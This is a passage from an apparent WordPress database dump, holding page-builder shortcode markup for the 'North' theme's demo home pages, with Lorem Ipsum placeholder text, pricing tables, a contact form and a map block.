animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home2','','inherit','closed','closed','','691-revision-v1','','','2014-07-15 12:08:06','2014-07-15 12:08:06','',691,'http://highperformingstudent.com/2014/07/15/691-revision-v1/',0,'revision','',0),(706,1,'2014-07-15 12:22:04','2014-07-15 12:22:04','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][vntd_fullscreen_slider images=\"542,543,544\" text_static=\"The goods you need now\" style=\"style2\" posts_nr=\"6\" bg_overlay=\"dark1\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"Welcome to North,We are Designers,We love to Design\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs tabs=\"%5B%7B%22title%22%3A%22Movie%22%2C%22heading%22%3A%22Movie%22%2C%22text%22%3A%22Contrary%20to%20popular%20belief%2C%20Lorem%20Ipsum%20is%20not%20simply%20random%20text.%20It%20has%20roots%20in%20a%20piece%20of%20classical%20Latin%20literature%20from%2045%20BC%2C%20making%20it%20over%202000%20years%20old.%20Rich%20McClintock%20not%20simply.%20There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form.%22%7D%2C%7B%22title%22%3A%22Landing%22%2C%22heading%22%3A%22Landing%22%2C%22text%22%3A%22There%20are%20many%20variations%20of%20passages%20of%20Lorem%20Ipsum%20available%2C%20but%20the%20majority%20have%20suffered%20alteration%20in%20some%20form%2C%20by%20injected%20humour%2C%20or%20randomised%20words%20which%20don%E2%80%99t%20look%20even%20snormally%20believable.%20If%20you%20are%20going%20to%20use%20a%20passage%20of%20Lorem%20Ipsum%2C%20you%20need%20to%20be%20sure%20there%20isn%E2%80%99t%20anything%20embarrassing%20hidden%20in%20the%20middle%20of%20text.%20All%20the%20Lorem%20Ipsum%20generators%20on%20the%20Internet%20tend%20to%20repeat%20predefined%20chunks%20as%20necessary%2C%20making%20this%20the%20first%20true%20generator%20on%20the%20Internet.%20It%20uses%20a%20dictionary%20of%20over%20200%20Latin%20words%2C%20combined%20with%20a%20handful%20of%20model%20sentence%20structures%2C%20to%20generate%20Lorem%20Ipsum%20which%20looks%20reasonable.%20The%20generated%20Lorem%20Ipsum%20is%20therefore%20always%20free%20from%20repetition%2C%20injected%20humour%2C%20or%20non-characteristic%20words%20etc.%22%7D%2C%7B%22title%22%3A%22Design%22%2C%22heading%22%3A%22Design%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%2C%7B%22title%22%3A%22Art%22%2C%22heading%22%3A%22Art%22%2C%22text%22%3A%22It%20is%20a%20long%20established%20fact%20that%20a%20reader%20will%20be%20distracted%20by%20the%20readable%20content%20of%20a%20page%20when%20looking%20at%20its%20layout.%20The%20point%20of%20using%20Lorem%20Ipsum%20is%20that%20it%20has%20a%20more-or-less%20normal%20distribution%20of%20letters%2C%20as%20opposed%20to%20using%20%E2%80%98Content%20here%2C%20content%20here%E2%80%99%2C%20making%20it%20look%20like%20readable%20English.%22%7D%5D\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css_animation=\"left-to-right\"]\n<h1>PARALLAX WITH DEGRADE</h1>\nContrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock not simply.\n\n[list icon=\"caret-right\" color=\"dark\" background=\"yes\"]\n\n[li]There are many variations of passages.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]Contrary to popular belief, Lorem Ipsum is not simply random text.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.[/li]\n\n[li]Finibus Bonorum et Malorum (The Extremes of Good and Evil) by Cicero.<span style=\"color: #ffffff;\">.</span>[/li]\n\n[li]But I must explain to you how all this mistaken idea<span style=\"color: #ffffff;\">.</span>[/li]\n\n[/list]\n\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium dolorem que laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.\n\n[button label=\"Read More\" url=\"#\" color=\"black\"][/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"601\" css_animation=\"right-to-left\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" alignment=\"right\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"facts\"][vc_column width=\"1/1\"][special_heading title=\"WHAT OUR FUN FACTORS\" color=\"dark\" animated=\"yes\" margin_bottom=\"0\"][vc_row_inner][vc_column_inner width=\"1/4\"][counter title=\"Days Worked\" number=\"640\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Projects Finished\" number=\"1250\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Coffee Cups\" number=\"2040\"][/vc_column_inner][vc_column_inner width=\"1/4\"][counter title=\"Pizza Ordered\" number=\"1620\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406483441587{border-top-width: 1px !important;padding-bottom: 20px !important;background-color: #fdfdfd !important;border-color: #eeeeee !important;border-style: solid !important;}\" el_id=\"works\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Portfolio\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old.\"][portfolio_grid filter=\"yes\" style=\"default\" cols=\"5\" thumb_size=\"square\" paged_posts=\"no\" cats=\"branding,design,photography,video\" thumb_style=\"alt\" fullwidth=\"no\" thumb_space=\"no\"][/vc_column][/vc_row][vc_row el_id=\"team\"][vc_column width=\"1/1\"][special_heading title=\"Our Creative Team\" color=\"dark\" animated=\"no\" margin_bottom=\"0\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][team_carousel posts_nr=\"6\"][/vc_column][/vc_row][vc_row el_id=\"features\" css=\".vc_custom_1405099363182{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i21.jpg?id=537) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][special_heading title=\"Features With Mobile\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical. There are many variations of passages of Lorem Ipsum available.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709800403{padding-top: 60px !important;}\"][icon_box title=\"Analystic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-camera-retro\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Web Design\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"right\" icon=\"fa-cog\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1405423153057{padding-right: 0px !important;padding-left: 0px !important;}\"][vc_single_image image=\"606\" alignment=\"center\" border_color=\"grey\" img_link_target=\"_self\" img_size=\"full\" css=\".vc_custom_1405099308623{margin-bottom: -250px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1406709805475{padding-top: 60px !important;}\"][icon_box title=\"Wordpress\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"200\"][icon_box title=\"Graphic\" text=\"There are many variations of passages of the Lorem Ipsum available, but the majority have suffered alteration in some form.\" link_title=\"More Info\" target=\"_self\" style=\"left\" icon=\"fa-paper-plane-o\" animated=\"yes\" animation_delay=\"400\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1406709814532{padding-top: 100px !important;padding-bottom: 100px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1408506142478{padding-top: 0px !important;background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/06/testimonials-1.jpg?id=924) !important;}\" bg_overlay=\"dark\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][testimonials style=\"simple\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404037588724{padding-bottom: 70px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"What Clients Says\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][testimonials style=\"expanded\" posts_nr=\"4\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1404039027476{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #3a3a3a !important;}\"][vc_column width=\"1/1\"][logos_carousel images=\"568,566,567,563,564,565\" onclick=\"custom_link\" custom_links=\"#,#,#,#,#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403955268505{margin-bottom: -15px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/1\"][special_heading title=\"WHY DO YOU CHOOSE NORTH?\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"0\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1409773927619{padding-bottom: 80px !important;}\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" el_id=\"what-we\"][vc_column width=\"1/2\"][vc_tabs][vc_tab title=\"Design\" tab_id=\"1403954748-1-96f2de-a384c686-9309\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\"><img class=\"alignleft size-full wp-image-926\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone.png\" alt=\"mini-phone\" width=\"164\" height=\"116\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Company\" tab_id=\"1403954748-2-63f2de-a384c686-9309\"][vc_column_text]<a href=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\"><img class=\"alignright size-full wp-image-927\" src=\"http://veented.com/workshops/north/north2/wp-content/uploads/2014/06/mini-phone1.png\" alt=\"mini-phone1\" width=\"130\" height=\"165\" /></a>Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][vc_tab title=\"Support\" tab_id=\"1405423831831-2-6c686-9309\"][vc_column_text]Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in a piece of classical Latin literature from 45 BC, making it over 2000 years old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia, looked up one of the more obscure Latin words, consectetur, from a Lorem Ipsum passage, and going through the cites of the word in classical literature, discover the undoubtable source.[/vc_column_text][/vc_tab][/vc_tabs][/vc_column][vc_column width=\"1/2\"][vc_accordion][vc_accordion_tab title=\"Awesome Design\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Improved Documentation\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][vc_accordion_tab title=\"Clean Coded\"][vc_column_text]Anim pariatur cliche reprehenderit, enim eiusmod high life accusamus terry richardson ad squid. 3 wolf moon officia aute, non cupidatat skateboard dolor brunch. Food truck quinoa nesciunt laborum eiusmod.[/vc_column_text][/vc_accordion_tab][/vc_accordion][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099662664{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i31.jpg?id=538) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" fullwidth=\"yes\" parallax=\"yes\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Featured Works\" color=\"dark\" animated=\"yes\" subtitle=\"CONTRARY TO POPULAR BELIEF, LOREM IPSUM IS NOT SIMPLY RANDOM TEXT. IT HAS ROOTS IN PIECE OF CLASSICAL. THERE ARE MANY VARIATIONS OF PASSAGES OF LOREM IPSUM AVAILABLE.\"][portfolio_carousel cats=\"branding,design,photography,video\" posts_nr=\"6\" thumb_style=\"alt\"][cta heading=\"super responsive, clean and creative theme\" subtitle=\"This is Photoshop\'s version of Lorem Ipsum. Proin gravida nibh vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum.\" button1_title=\"Our Portfolio\" button1_url=\"#works\" button2_title=\"Keep in Touch\" button2_url=\"#contact\" margin_bottom=\"0\" button1_subtitle=\"click for our all works\" button2_subtitle=\"send us a message\" style=\"centered\" button_color=\"white\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1403956257324{background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\"][vc_column width=\"1/1\"][special_heading title=\"Our Skills\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"55|Design,85|Wordpress,75|HTML&amp;CSS\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_progress_bar values=\"70|Photography,75|Web Design,80|Photoshop\" bgcolor=\"bar_black\" units=\"%\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099917341{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i41.jpg?id=539) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\" el_id=\"services\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"OUR SERVICES\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin old. Richard McClintock, a Latin professor at Hampden-Sydney College in Virginia.\"][services_carousel posts_nr=\"5\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405099958560{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" darken=\"light\" bg_overlay=\"darker\" color_scheme=\"white\" el_id=\"prices\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading title=\"Our Pricing Tables\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\" margin_bottom=\"60\"][vc_row_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Starter\" price=\"$19\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"100\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Standard\" price=\"$39\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"300\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Professional\" price=\"$59\" period=\"per year\" featured=\"yes\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"500\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][vc_column_inner width=\"1/4\"][pricing_box title=\"Platinum\" price=\"$79\" period=\"per year\" featured=\"no\" button_label=\"Buy Now\" animated=\"yes\" animation_delay=\"700\" features=\"PREMIUM PROFILE LISTING,UNLIMITED FILE ACCESS,FREE APPOINTMENTS,5 BONUS POINTS EVERY MONTH,2 MONTHS SUPPORT,2 SUBDOMAINS\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1404125302141{padding-bottom: 70px !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}\" darken=\"light\" bg_overlay=\"light\"][vc_column width=\"1/1\"][special_heading title=\"Keep in Touch\" color=\"dark\" animated=\"yes\" subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical.\"][vntd_contact_form email=\"prafgon@gmail.com\" label_name=\"Please enter your Name\" label_email=\"Please enter your E-Mail\" label_subject=\"Please enter your Subject\" label_message=\"Please enter your Message\" label_submit=\"Send E-Mail\" id=\"417\" animated=\"no\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405424323297{background-image: url(http://highperformingstudent.com/wp-content/uploads/2014/07/i51.jpg?id=540) !important;}\" bg_overlay=\"darker\" el_id=\"contact\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\" parallax=\"yes\"][vc_column width=\"1/1\"][contact_block phone=\"0123 456 789\" address=\"NORTH, STREET NAME 6209, MELBOURNE AUSTRALIA\" email=\"SUPPORT@GOLDEYESTHEME.COM\" facebook=\"#\" twitter=\"#\" linkedin=\"#\" youtube=\"#\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405425125857{padding-top: 0px !important;padding-bottom: 0px !important;}\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][gmap lat=\"41.862274\" long=\"-87.701328\" height=\"400\" zoom=\"15\" marker1_title=\"Office 1\" marker1_text=\"Your description goes here.\" marker1_location=\"custom\" marker1_location_custom=\"41.863774,-87.721328\" marker2_title=\"Our other store\" marker2_text=\"My secondary marker description.\" marker2_location=\"41.858774,-87.685328\"][/vc_column][/vc_row]','Home4','','publish','open','open','','home4','','','2020-10-28 13:47:38','2020-10-28 13:47:38','',0,'http://veented.com/themes/north/?page_id=706',0,'page','',0),(1920,1,'2014-07-15 12:22:04','2014-07-15 12:22:04','[vc_row css=\".vc_custom_1405098881992{padding-top: 0px !important;padding-bottom: 0px !important;}\" el_id=\"first\" fullwidth=\"yes\" row_width=\"fullwidth\" content_width=\"fullwidth\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][vntd_fullscreen_slider images=\"542,543,544\" text_static=\"The goods you need now\" style=\"style2\" posts_nr=\"6\" bg_overlay=\"dark1\" button1_label=\"Read more\" button1_url=\"#about\" animated=\"no\" text_dynamic=\"Welcome to North,We are Designers,We love to Design\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1405422234264{padding-top: 0px !important;padding-bottom: 0px !important;background-color: #1f1f1f !important;}\" color_scheme=\"white\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][cta button_title=\"Click me!\" button_url=\"http://\" button_color=\"dark\" button_color_custom=\"#5cbbf5\" text_align=\"left\" fullwidth=\"no\" subtitle=\"It is a long established fact that a reader will be distracted by the readable content of at its layout.\" button1_title=\"Purchase\" button1_url=\"#\" button2_title=\"Get Started\" button2_url=\"#about\" heading=\"Welcome to North!\" style=\"default\"]WELCOME TO NORTH![/cta][/vc_column][/vc_row][vc_row el_id=\"about\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"About North\" color=\"dark\" animated=\"yes\" margin_bottom=\"65\"]About North[/special_heading][vc_row_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Professional Design\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-desktop\" animated=\"yes\" animation_delay=\"300\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Retina Ready\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-comments-o\" animated=\"yes\" animation_delay=\"500\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"7x24 Support\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-life-ring\" animated=\"yes\" animation_delay=\"700\"][/vc_column_inner][vc_column_inner width=\"1/4\"][icon_box title=\"Clean Coding\" text=\"There are many variations of passages of Lorem Ipsum available, but the joy have suffered alteration in some format, by injected humour.\" link_title=\"More Info\" target=\"_self\" text_style=\"fullwidth\" style=\"centered\" icon=\"fa-flask\" animated=\"yes\" animation_delay=\"900\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row el_id=\"what-we-do\" css=\".vc_custom_1405099060231{background-image: url(http://veented.com/workshops/north/north2/wp-content/uploads/2014/07/i11.jpg?id=536) !important;}\" color_scheme=\"white\" darken=\"dark\" bg_overlay=\"dark\" parallax=\"yes\" content_width=\"container\" video_autoplay=\"true\" video_controls=\"true\" video_mute=\"true\"][vc_column width=\"1/1\"][special_heading subtitle=\"Contrary to popular belief, Lorem Ipsum is not simply random text. It has roots in piece of classical Latin literature from 45 BC, it a old. Richard McClintock, looked up one of the more obscure\" text_align=\"center\" title=\"What we do\" color=\"white\" animated=\"yes\" margin_bottom=\"0\"]About North[/special_heading][north_tabs 